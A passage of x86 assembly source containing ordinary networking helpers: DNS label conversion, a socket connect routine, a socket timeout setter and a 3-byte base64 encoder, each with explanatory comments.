xor cl, cl ; cl = length of the current label
mov edx, dest ; edx -> length slot of the current label
findDot:
cmp byte ptr [esi], '.'
je writeTotal
cmp byte ptr [esi], 0
je convertComplete
mov al, [esi]
mov [edi], al
inc esi
inc edi
inc cl
jmp findDot
convertComplete:
mov byte ptr [edx], cl ; length of the last label
mov edx, edi
mov byte ptr [edi], 0 ; zero byte ends the name
ret
writeTotal:
mov byte ptr [edx], cl ; length of the label just finished
xor cl, cl
mov edx, edi ; the next slot is where the '.' would have gone
inc edi
inc esi
jmp findDot
StringToLabels ENDP
; ConnectToHost
; In:  lpSocket   = address of a DWORD that receives the socket handle
;      lpHostName = zero-terminated host name or address string
;      port       = port number in host byte order
;      protocol   = socket type passed to socket() (SOCK_STREAM / SOCK_DGRAM)
; Out: eax = 0 on success, -1 on failure (the socket is closed on failure)
; Uses the global SockAddress structure; eax and ebx are overwritten.
ConnectToHost PROC lpSocket:DWORD, lpHostName:DWORD, port:DWORD, protocol:DWORD
;
; This function connects to a host:port
;
; Create a socket
call socket, AF_INET, protocol, PCL_NONE
mov ebx, [lpSocket]
mov [ebx], eax ; store the handle for the caller
cmp eax, -1
je connFailed
; Create address
mov SockAddress.sin_family, AF_INET
call htons, port
mov SockAddress.sin_port, ax
call gethostbyname, lpHostName
cmp eax, 0
je connFailed
; offset 12 of the returned hostent is h_addr_list; the first entry of that
; list points at the 4-byte address
mov eax, [eax+12]
mov eax, [eax]
mov eax, [eax]
mov SockAddress.sin_addr, eax
; connect to address
mov ebx, [lpSocket]
; 16 = size of the SOCK_ADDRESS structure
call connect, dword ptr [ebx], offset SockAddress, 16
cmp eax, 0
jne connFailed
; return success code
xor eax, eax
ret
connFailed:
; close the socket
mov ebx, [lpSocket]
call closesocket, dword ptr [ebx]
; return failure code
mov eax, -1
ret
ConnectToHost ENDP
; TimeOut
; In:  sock = socket handle; milliseconds = timeout value
; Out: none (setsockopt results are not checked)
; Stores the value in the global IOTimeOut and applies it as both the receive
; and the send timeout of the socket.
TimeOut PROC sock:DWORD, milliseconds:DWORD
;
; Set the timeout for sending and recieving data
;
mov eax, milliseconds
mov IOTimeOut, eax
; 4 = size in bytes of the IOTimeOut value passed as the option
call setsockopt, sock, SOL_SOCKET, SO_RCVTIMEO, offset IOTimeOut, 4
call setsockopt, sock, SOL_SOCKET, SO_SNDTIMEO, offset IOTimeOut, 4
ret
TimeOut ENDP
; Base64Encode
; In:  threeBytes = address of 3 input bytes
;      fourBytes  = address of a 4-byte output buffer
; Out: 4 base64 characters at fourBytes; esi, edi and eax are overwritten
; The three bytes are stored in reverse order in the output buffer so they
; can be loaded as one 24-bit value, which is then split into four 6-bit
; indexes. addBase maps an index to its character:
;   0-25 -> 'A'-'Z', 26-51 -> 'a'-'z', 52-61 -> '0'-'9', 62 -> '+',
;   anything else -> '/'
; There is no '=' padding path; the routine always consumes exactly 3 bytes.
Base64Encode PROC threeBytes:DWORD, fourBytes:DWORD
;
; Converts 3 ASCII bytes to 4 Base64 encoded bytes
;
mov esi, threeBytes
mov edi, fourBytes
; reverse the byte order
mov al, [esi+2]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi]
mov [edi+2], al
mov byte ptr [edi+3], 0
mov eax, [edi] ; eax = 24-bit group, first input byte in bits 23..16
; convert first 6 bits
push eax
and eax, 0FC0000h
shr eax, 18
call addBase
mov [edi], al
pop eax
; convert second 6 bits
push eax
and eax, 3F000h
shr eax, 12
call addBase
mov [edi+1], al
pop eax
; convert third 6 bits
push eax
and eax, 0FC0h
shr eax, 6
call addBase
mov [edi+2], al
pop eax
; convert forth 6 bits
push eax
and eax, 3Fh
call addBase
mov [edi+3], al
pop eax
ret
; addBase: al = 6-bit index in, al = base64 character out
addBase:
cmp al, 25
jle add65
cmp al, 51
jle add71
cmp al, 61
jle sub4
cmp al, 62
je mov43
; the jump below is unconditional, so the result of this compare is unused
cmp al, 63
jmp mov47
add65: add al, 65 ; 0-25 -> 'A'-'Z'
ret 0
add71: add al, 71 ; 26-51 -> 'a'-'z'
ret 0
sub4: sub al, 4 ; 52-61 -> '0'-'9'
ret 0
mov43: mov al, 43 ; '+'
ret 0
mov47: mov al, 47 ; '/'
ret 0
Base64Encode ENDP
End Main ; End of code